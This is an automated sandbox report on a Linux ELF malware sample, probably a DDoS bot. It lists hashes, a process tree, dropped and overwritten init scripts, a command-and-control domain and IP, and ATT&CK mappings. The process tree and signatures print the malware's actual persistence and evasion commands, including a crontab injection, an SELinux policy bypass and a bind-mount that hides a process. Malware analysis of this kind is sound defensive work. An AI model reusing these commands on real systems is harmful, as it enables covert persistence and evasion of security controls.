Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
ausNOyj9by.elf

Overview

General Information

Sample name:ausNOyj9by.elf
renamed because original name is a hash value
Original sample name:ac46e9818cd936fbfcba5effd7f4e850.elf
Analysis ID:1466257
MD5:ac46e9818cd936fbfcba5effd7f4e850
SHA1:9a058ce2e1a413ae24b0c23e49b68d1b2f3f2777
SHA256:e23cd1ab03a3a03803e920efb2001fc6c4ae34c50ef647271898edc1c87ccde4
Tags:32elfintel
Infos:

Detection

Score:72
Range:0 - 100
Whitelisted:false

Signatures

Multi AV Scanner detection for submitted file
Drops files in suspicious directories
Machine Learning detection for sample
Sample tries to persist itself using /etc/profile
Sample tries to persist itself using System V runlevels
Sample tries to persist itself using cron
Sample tries to set files in /etc globally writable
Creates hidden files and/or directories
Creates hidden files without content (potentially used as a mutex)
Detected TCP or UDP traffic on non-standard ports
Executes commands using a shell command-line interpreter
Executes the "systemctl" command used for controlling the systemd system and service manager
Reads the 'hosts' file potentially containing internal network hosts
Sample has stripped symbol table
Sample tries to set the executable flag
Sleeps for long times indicative of sandbox evasion
Uses the "uname" system call to query kernel version information (possible evasion)
Writes shell script file to disk with an unusual file extension
Writes shell script files to disk

Classification

Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1466257
Start date and time:2024-07-02 18:12:23 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 1s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:ausNOyj9by.elf
renamed because original name is a hash value
Original Sample Name:ac46e9818cd936fbfcba5effd7f4e850.elf
Detection:MAL
Classification:mal72.spre.troj.evad.linELF@0/57@146/0
  • VT rate limit hit for: ausNOyj9by.elf
Command:/tmp/ausNOyj9by.elf
PID:5482
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:

Standard Error:
  • system is lnxubuntu20
  • ausNOyj9by.elf (PID: 5482, Parent: 5408, MD5: ac46e9818cd936fbfcba5effd7f4e850) Arguments: /tmp/ausNOyj9by.elf
    • ausNOyj9by.elf (PID: 5486, Parent: 5482, MD5: ac46e9818cd936fbfcba5effd7f4e850) Arguments: /tmp/ausNOyj9by.elf
      • bash (PID: 5494, Parent: 5486, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /bin/bash -c "cd /boot;systemctl daemon-reload;systemctl enable quotaon.service;systemctl start quotaon.service;journalctl -xe --no-pager"
        • bash New Fork (PID: 5495, Parent: 5494)
        • systemctl (PID: 5495, Parent: 5494, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload
        • bash New Fork (PID: 5499, Parent: 5494)
        • systemctl (PID: 5499, Parent: 5494, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable quotaon.service
        • bash New Fork (PID: 5503, Parent: 5494)
        • systemctl (PID: 5503, Parent: 5494, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start quotaon.service
        • bash New Fork (PID: 5504, Parent: 5494)
        • journalctl (PID: 5504, Parent: 5494, MD5: bf3a987344f3bacafc44efd882abda8b) Arguments: journalctl -xe --no-pager
      • bash (PID: 5505, Parent: 5486, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /bin/bash -c "cd /boot;ausearch -c 'system.pub' --raw | audit2allow -M my-Systemmod;semodule -X 300 -i my-Systemmod.pp"
        • bash New Fork (PID: 5506, Parent: 5505)
        • bash New Fork (PID: 5507, Parent: 5505)
        • bash New Fork (PID: 5508, Parent: 5505)
      • bash (PID: 5511, Parent: 5486, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /bin/bash -c "echo \"*/1 * * * * root /.mod \" >> /etc/crontab"
      • update-rc.d (PID: 5512, Parent: 5486, MD5: 16a21f464119ea7fad1d3660de963637) Arguments: update-rc.d dns-udp4 defaults
        • systemctl (PID: 5513, Parent: 5512, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload
      • mount (PID: 5517, Parent: 5486, MD5: 92b20aa8b155ecd3ba9414aa477ef565) Arguments: mount -o bind /tmp/ /proc/5486
      • service (PID: 5539, Parent: 5486, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: service cron start
        • service New Fork (PID: 5540, Parent: 5539)
        • basename (PID: 5540, Parent: 5539, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
        • service New Fork (PID: 5541, Parent: 5539)
        • basename (PID: 5541, Parent: 5539, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
        • service New Fork (PID: 5542, Parent: 5539)
        • systemctl (PID: 5542, Parent: 5539, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl --quiet is-active multi-user.target
        • service New Fork (PID: 5543, Parent: 5539)
          • service New Fork (PID: 5544, Parent: 5543)
          • systemctl (PID: 5544, Parent: 5543, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl list-unit-files --full --type=socket
          • service New Fork (PID: 5545, Parent: 5543)
          • sed (PID: 5545, Parent: 5543, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
      • systemctl (PID: 5539, Parent: 5486, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start cron.service
      • systemctl (PID: 5574, Parent: 5486, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start crond.service
  • systemd New Fork (PID: 5497, Parent: 5496)
  • snapd-env-generator (PID: 5497, Parent: 5496, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • systemd New Fork (PID: 5501, Parent: 5500)
  • snapd-env-generator (PID: 5501, Parent: 5500, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • systemd New Fork (PID: 5515, Parent: 5514)
  • snapd-env-generator (PID: 5515, Parent: 5514, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • udisksd New Fork (PID: 5528, Parent: 803)
  • dumpe2fs (PID: 5528, Parent: 803, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • systemd New Fork (PID: 5564, Parent: 1)
  • cron (PID: 5564, Parent: 1, MD5: 2c82564ff5cc862c89392b061c7fbd59) Arguments: /usr/sbin/cron -f
    • cron New Fork (PID: 5609, Parent: 5564)
      • cron New Fork (PID: 5617, Parent: 5609)
      • sh (PID: 5617, Parent: 5609, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "/.mod "
        • sh New Fork (PID: 5618, Parent: 5617)
        • .mod (PID: 5618, Parent: 5617, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /.mod
          • .mod New Fork (PID: 5619, Parent: 5618)
          • libgdi.so.0.8.2 (PID: 5619, Parent: 5618, MD5: ac46e9818cd936fbfcba5effd7f4e850) Arguments: /usr/lib/libgdi.so.0.8.2
            • libgdi.so.0.8.2 (PID: 5623, Parent: 5619, MD5: ac46e9818cd936fbfcba5effd7f4e850) Arguments: /usr/lib/libgdi.so.0.8.2
  • systemd New Fork (PID: 5641, Parent: 1)
  • cron (PID: 5641, Parent: 1, MD5: 2c82564ff5cc862c89392b061c7fbd59) Arguments: /usr/sbin/cron -f
    • cron New Fork (PID: 5670, Parent: 5641)
      • cron New Fork (PID: 5678, Parent: 5670)
      • sh (PID: 5678, Parent: 5670, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "/.mod "
        • sh New Fork (PID: 5679, Parent: 5678)
        • .mod (PID: 5679, Parent: 5678, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /.mod
          • .mod New Fork (PID: 5680, Parent: 5679)
          • libgdi.so.0.8.2 (PID: 5680, Parent: 5679, MD5: ac46e9818cd936fbfcba5effd7f4e850) Arguments: /usr/lib/libgdi.so.0.8.2
            • libgdi.so.0.8.2 (PID: 5684, Parent: 5680, MD5: ac46e9818cd936fbfcba5effd7f4e850) Arguments: /usr/lib/libgdi.so.0.8.2
  • systemd New Fork (PID: 5704, Parent: 1)
  • cron (PID: 5704, Parent: 1, MD5: 2c82564ff5cc862c89392b061c7fbd59) Arguments: /usr/sbin/cron -f
  • cleanup
No yara matches
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: ausNOyj9by.elfReversingLabs: Detection: 31%
Source: ausNOyj9by.elfJoe Sandbox ML: detected
Source: global trafficTCP traffic: 192.168.2.14:44534 -> 209.141.53.247:7788
Source: /tmp/ausNOyj9by.elf (PID: 5486)Reads hosts file: /etc/hostsJump to behavior
Source: global trafficDNS traffic detected: DNS query: botbot.ddosvps.cc
Source: ausNOyj9by.elfString found in binary or memory: http://.css
Source: ausNOyj9by.elfString found in binary or memory: http://.jpg
Source: ausNOyj9by.elfString found in binary or memory: http://html4/loose.dtd
Source: ELF static info symbol of initial sample.symtab present: no
Source: classification engineClassification label: mal72.spre.troj.evad.linELF@0/57@146/0
Source: ELF file sectionSubmission: ausNOyj9by.elf

Persistence and Installation Behavior

barindex
Source: /tmp/ausNOyj9by.elf (PID: 5486)File: /etc/profile.d/bash.cfg.shJump to behavior
Source: /tmp/ausNOyj9by.elf (PID: 5486)File: /etc/profile.d/gateway.shJump to behavior
Source: /usr/sbin/update-rc.d (PID: 5512)File: /etc/rc2.d/S01dns-udp4 -> ../init.d/dns-udp4Jump to behavior
Source: /usr/sbin/update-rc.d (PID: 5512)File: /etc/rc3.d/S01dns-udp4 -> ../init.d/dns-udp4Jump to behavior
Source: /usr/sbin/update-rc.d (PID: 5512)File: /etc/rc4.d/S01dns-udp4 -> ../init.d/dns-udp4Jump to behavior
Source: /usr/sbin/update-rc.d (PID: 5512)File: /etc/rc5.d/S01dns-udp4 -> ../init.d/dns-udp4Jump to behavior
Source: /bin/bash (PID: 5511)File: /etc/crontabJump to behavior
Source: /tmp/ausNOyj9by.elf (PID: 5486)File: /etc/profile.d/bash.cfg (bits: - usr: rx grp: rx all: rwx)Jump to behavior
Source: /tmp/ausNOyj9by.elf (PID: 5486)File: /etc/.ffff4444Jump to behavior
Source: /tmp/ausNOyj9by.elf (PID: 5486)File: /etc/.cfgJump to behavior
Source: /tmp/ausNOyj9by.elf (PID: 5486)File: /etc/.cfgJump to behavior
Source: /tmp/ausNOyj9by.elf (PID: 5486)File: /.modJump to behavior
Source: /.mod (PID: 5618)Directory: /.modJump to behavior
Source: /usr/lib/libgdi.so.0.8.2 (PID: 5623)File: /etc/.ffff4444Jump to behavior
Source: /usr/lib/libgdi.so.0.8.2 (PID: 5623)File: /etc/.cfgJump to behavior
Source: /.mod (PID: 5679)Directory: /.modJump to behavior
Source: /usr/lib/libgdi.so.0.8.2 (PID: 5684)File: /etc/.ffff4444Jump to behavior
Source: /usr/lib/libgdi.so.0.8.2 (PID: 5684)File: /etc/.cfgJump to behavior
Source: /usr/lib/libgdi.so.0.8.2 (PID: 5684)Empty hidden file: /etc/.ffff4444Jump to behavior
Source: /tmp/ausNOyj9by.elf (PID: 5494)Shell command executed: /bin/bash -c "cd /boot;systemctl daemon-reload;systemctl enable quotaon.service;systemctl start quotaon.service;journalctl -xe --no-pager"Jump to behavior
Source: /tmp/ausNOyj9by.elf (PID: 5505)Shell command executed: /bin/bash -c "cd /boot;ausearch -c 'system.pub' --raw | audit2allow -M my-Systemmod;semodule -X 300 -i my-Systemmod.pp"Jump to behavior
Source: /tmp/ausNOyj9by.elf (PID: 5511)Shell command executed: /bin/bash -c "echo \"*/1 * * * * root /.mod \" >> /etc/crontab"Jump to behavior
Source: /usr/sbin/cron (PID: 5617)Shell command executed: /bin/sh -c "/.mod "Jump to behavior
Source: /usr/sbin/cron (PID: 5678)Shell command executed: /bin/sh -c "/.mod "Jump to behavior
Source: /bin/bash (PID: 5495)Systemctl executable: /usr/bin/systemctl -> systemctl daemon-reloadJump to behavior
Source: /bin/bash (PID: 5499)Systemctl executable: /usr/bin/systemctl -> systemctl enable quotaon.serviceJump to behavior
Source: /bin/bash (PID: 5503)Systemctl executable: /usr/bin/systemctl -> systemctl start quotaon.serviceJump to behavior
Source: /usr/sbin/update-rc.d (PID: 5513)Systemctl executable: /usr/bin/systemctl -> systemctl daemon-reloadJump to behavior
Source: /usr/sbin/service (PID: 5539)Systemctl executable: /usr/bin/systemctl -> systemctl start cron.serviceJump to behavior
Source: /usr/sbin/service (PID: 5542)Systemctl executable: /usr/bin/systemctl -> systemctl --quiet is-active multi-user.targetJump to behavior
Source: /usr/sbin/service (PID: 5544)Systemctl executable: /usr/bin/systemctl -> systemctl list-unit-files --full --type=socketJump to behavior
Source: /tmp/ausNOyj9by.elf (PID: 5574)Systemctl executable: /usr/bin/systemctl -> systemctl start crond.serviceJump to behavior
Source: /tmp/ausNOyj9by.elf (PID: 5486)File: /boot/system.pub (bits: - usr: rx grp: rx all: rwx)Jump to behavior
Source: /tmp/ausNOyj9by.elf (PID: 5486)File: /etc/profile.d/bash.cfg (bits: - usr: rx grp: rx all: rwx)Jump to behavior
Source: /tmp/ausNOyj9by.elf (PID: 5486)File: /usr/lib/libgdi.so.0.8.2 (bits: - usr: rx grp: rx all: rwx)Jump to behavior
Source: /tmp/ausNOyj9by.elf (PID: 5486)File: /usr/lib/system.mark (bits: - usr: rx grp: rx all: rwx)Jump to behavior
Source: /tmp/ausNOyj9by.elf (PID: 5486)Writes shell script file to disk with an unusual file extension: /.modJump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)Writes shell script file to disk with an unusual file extension: /etc/init.d/acpidJump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)Writes shell script file to disk with an unusual file extension: /etc/init.d/alsa-utilsJump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)Writes shell script file to disk with an unusual file extension: /etc/init.d/anacronJump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)Writes shell script file to disk with an unusual file extension: /etc/init.d/apparmorJump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)Writes shell script file to disk with an unusual file extension: /etc/init.d/apportJump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)Writes shell script file to disk with an unusual file extension: /etc/init.d/avahi-daemonJump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)Writes shell script file to disk with an unusual file extension: /etc/init.d/binfmt-supportJump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)Writes shell script file to disk with an unusual file extension: /etc/init.d/bluetoothJump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)Writes shell script file to disk with an unusual file extension: /etc/init.d/cronJump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)Writes shell script file to disk with an unusual file extension: /etc/init.d/cryptdisksJump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)Writes shell script file to disk with an unusual file extension: /etc/init.d/cryptdisks-earlyJump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)Writes shell script file to disk with an unusual file extension: /etc/init.d/cupsJump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)Writes shell script file to disk with an unusual file extension: /etc/init.d/cups-browsedJump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)Writes shell script file to disk with an unusual file extension: /etc/init.d/dbusJump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)Writes shell script file to disk with an unusual file extension: /etc/init.d/gdm3Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)Writes shell script file to disk with an unusual file extension: /etc/init.d/hddtempJump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)Writes shell script file to disk with an unusual file extension: /etc/init.d/irqbalanceJump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)Writes shell script file to disk with an unusual file extension: /etc/init.d/iscsidJump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)Writes shell script file to disk with an unusual file extension: /etc/init.d/kmodJump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)Writes shell script file to disk with an unusual file extension: /etc/init.d/lightdmJump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)Writes shell script file to disk with an unusual file extension: /etc/init.d/lm-sensorsJump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)Writes shell script file to disk with an unusual file extension: /etc/init.d/lvm2-lvmpolldJump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)Writes shell script file to disk with an unusual file extension: /etc/init.d/mono-xsp4Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)Writes shell script file to disk with an unusual file extension: /etc/init.d/multipath-toolsJump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)Writes shell script file to disk with an unusual file extension: /etc/init.d/open-iscsiJump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)Writes shell script file to disk with an unusual file extension: /etc/init.d/open-vm-toolsJump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)Writes shell script file to disk with an unusual file extension: /etc/init.d/plymouthJump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)Writes shell script file to disk with an unusual file extension: /etc/init.d/plymouth-logJump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)Writes shell script file to disk with an unusual file extension: /etc/init.d/procpsJump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)Writes shell script file to disk with an unusual file extension: /etc/init.d/rsyncJump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)Writes shell script file to disk with an unusual file extension: /etc/init.d/rsyslogJump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)Writes shell script file to disk with an unusual file extension: /etc/init.d/sanedJump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)Writes shell script file to disk with an unusual file extension: /etc/init.d/screen-cleanupJump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)Writes shell script file to disk with an unusual file extension: /etc/init.d/spice-vdagentJump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)Writes shell script file to disk with an unusual file extension: /etc/init.d/sshJump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)Writes shell script file to disk with an unusual file extension: /etc/init.d/udevJump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)Writes shell script file to disk with an unusual file extension: /etc/init.d/ufwJump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)Writes shell script file to disk with an unusual file extension: /etc/init.d/unattended-upgradesJump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)Writes shell script file to disk with an unusual file extension: /etc/init.d/uuiddJump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)Writes shell script file to disk with an unusual file extension: /etc/init.d/x11-commonJump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)Writes shell script file to disk with an unusual file extension: /etc/init.d/dns-udp4Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)Shell script file created: /etc/profile.d/bash.cfg.shJump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)Shell script file created: /etc/init.d/console-setup.shJump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)Shell script file created: /etc/init.d/hwclock.shJump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)Shell script file created: /etc/init.d/keyboard-setup.shJump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)Shell script file created: /etc/profile.d/gateway.shJump to dropped file
Source: /usr/sbin/service (PID: 5545)Sed executable: /usr/bin/sed -> sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/pJump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Source: /tmp/ausNOyj9by.elf (PID: 5486)File: /etc/init.d/acpidJump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)File: /etc/init.d/alsa-utilsJump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)File: /etc/init.d/anacronJump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)File: /etc/init.d/apparmorJump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)File: /etc/init.d/apportJump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)File: /etc/init.d/avahi-daemonJump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)File: /etc/init.d/binfmt-supportJump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)File: /etc/init.d/bluetoothJump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)File: /etc/init.d/console-setup.shJump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)File: /etc/init.d/cronJump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)File: /etc/init.d/cryptdisksJump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)File: /etc/init.d/cryptdisks-earlyJump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)File: /etc/init.d/cupsJump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)File: /etc/init.d/cups-browsedJump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)File: /etc/init.d/dbusJump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)File: /etc/init.d/gdm3Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)File: /etc/init.d/hddtempJump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)File: /etc/init.d/hwclock.shJump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)File: /etc/init.d/irqbalanceJump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)File: /etc/init.d/iscsidJump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)File: /etc/init.d/keyboard-setup.shJump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)File: /etc/init.d/kmodJump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)File: /etc/init.d/lightdmJump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)File: /etc/init.d/lm-sensorsJump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)File: /etc/init.d/lvm2-lvmpolldJump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)File: /etc/init.d/mono-xsp4Jump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)File: /etc/init.d/multipath-toolsJump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)File: /etc/init.d/open-iscsiJump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)File: /etc/init.d/open-vm-toolsJump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)File: /etc/init.d/plymouthJump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)File: /etc/init.d/plymouth-logJump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)File: /etc/init.d/procpsJump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)File: /etc/init.d/rsyncJump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)File: /etc/init.d/rsyslogJump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)File: /etc/init.d/sanedJump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)File: /etc/init.d/screen-cleanupJump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)File: /etc/init.d/spice-vdagentJump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)File: /etc/init.d/sshJump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)File: /etc/init.d/udevJump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)File: /etc/init.d/ufwJump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)File: /etc/init.d/unattended-upgradesJump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)File: /etc/init.d/uuiddJump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)File: /etc/init.d/x11-commonJump to dropped file
Source: /tmp/ausNOyj9by.elf (PID: 5486)File: /etc/init.d/dns-udp4Jump to dropped file
Source: /usr/sbin/cron (PID: 5564)Sleeps longer then 60s: 60.0sJump to behavior
Source: /usr/sbin/cron (PID: 5641)Sleeps longer then 60s: 60.0sJump to behavior
Source: /usr/sbin/cron (PID: 5704)Sleeps longer then 60s: 60.0sJump to behavior
Source: /tmp/ausNOyj9by.elf (PID: 5486)Queries kernel information via 'uname': Jump to behavior
Source: /bin/bash (PID: 5494)Queries kernel information via 'uname': Jump to behavior
Source: /bin/bash (PID: 5505)Queries kernel information via 'uname': Jump to behavior
Source: /bin/bash (PID: 5511)Queries kernel information via 'uname': Jump to behavior
Source: /.mod (PID: 5618)Queries kernel information via 'uname': Jump to behavior
Source: /.mod (PID: 5679)Queries kernel information via 'uname': Jump to behavior
Source: open-vm-tools.14.drBinary or memory string: # Check if we're running inside VMWare
Source: open-vm-tools.14.drBinary or memory string: start-stop-daemon --start --quiet --pidfile /var/run/vmtoolsd.pid --exec /usr/bin/vmtoolsd --test > /dev/null || exit 1
Source: open-vm-tools.14.drBinary or memory string: if ! ${checktool} | grep -iq vmware; then
Source: open-vm-tools.14.drBinary or memory string: rm -f /var/run/vmtoolsd.pid
Source: open-vm-tools.14.drBinary or memory string: checktool='vmware-checkvm'
Source: open-vm-tools.14.drBinary or memory string: start-stop-daemon --stop --quiet --retry=TERM/30/KILL/5 --pidfile /var/run/vmtoolsd.pid --exec /usr/bin/vmtoolsd
Source: open-vm-tools.14.drBinary or memory string: log_daemon_msg "Stopping open-vm guest daemon" "vmtoolsd"
Source: open-vm-tools.14.drBinary or memory string: echo "open-vm-tools: not starting as this is not a VMware VM"
Source: open-vm-tools.14.drBinary or memory string: start-stop-daemon --start --quiet --pidfile /var/run/vmtoolsd.pid --exec /usr/bin/vmtoolsd -- --background /var/run/vmtoolsd.pid || exit 2
Source: open-vm-tools.14.drBinary or memory string: log_daemon_msg "Starting open-vm daemon" "vmtoolsd"
Source: open-vm-tools.14.drBinary or memory string: status_of_proc -p /var/run/vmtoolsd.pid /usr/bin/vmtoolsd vmtoolsd && exit 0 || exit $?
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information2
Scripting
Valid Accounts1
Command and Scripting Interpreter
1
Unix Shell Configuration Modification
1
Unix Shell Configuration Modification
1
Masquerading
OS Credential Dumping11
Security Software Discovery
Remote ServicesData from Local System1
Non-Standard Port
Exfiltration Over Other Network Medium1
Data Manipulation
CredentialsDomainsDefault AccountsScheduled Task/Job1
Systemd Service
1
Systemd Service
1
Hide Artifacts
LSASS Memory1
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAt2
Scripting
Logon Script (Windows)1
Virtualization/Sandbox Evasion
Security Account Manager1
File and Directory Discovery
SMB/Windows Admin SharesData from Network Shared Drive1
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
File and Directory Permissions Modification
NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Hidden Files and Directories
LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1466257 Sample: ausNOyj9by.elf Startdate: 02/07/2024 Architecture: LINUX Score: 72 81 botbot.ddosvps.cc 209.141.53.247, 44534, 44536, 44538 PONYNETUS United States 2->81 83 Multi AV Scanner detection for submitted file 2->83 85 Machine Learning detection for sample 2->85 11 ausNOyj9by.elf 2->11         started        13 systemd cron 2->13         started        15 systemd cron 2->15         started        17 5 other processes 2->17 signatures3 process4 process5 19 ausNOyj9by.elf ausNOyj9by.elf 11->19         started        23 cron 13->23         started        25 cron 15->25         started        file6 71 /etc/profile.d/gateway.sh, Bourne-Again 19->71 dropped 73 /etc/profile.d/bash.cfg.sh, Bourne-Again 19->73 dropped 75 /etc/init.d/x11-common, POSIX 19->75 dropped 77 44 other files (43 malicious) 19->77 dropped 87 Sample tries to set files in /etc globally writable 19->87 89 Sample tries to persist itself using /etc/profile 19->89 91 Drops files in suspicious directories 19->91 27 ausNOyj9by.elf bash 19->27         started        31 ausNOyj9by.elf update-rc.d 19->31         started        33 ausNOyj9by.elf service systemctl 19->33         started        39 4 other processes 19->39 35 cron sh 23->35         started        37 cron sh 25->37         started        signatures7 process8 file9 79 /etc/crontab, ASCII 27->79 dropped 93 Sample tries to persist itself using cron 27->93 95 Sample tries to persist itself using System V runlevels 31->95 41 update-rc.d systemctl 31->41         started        43 service 33->43         started        55 3 other processes 33->55 45 sh .mod 35->45         started        47 sh .mod 37->47         started        49 bash systemctl 39->49         started        51 bash systemctl 39->51         started        53 bash systemctl 39->53         started        57 4 other processes 39->57 signatures10 process11 process12 59 service systemctl 43->59         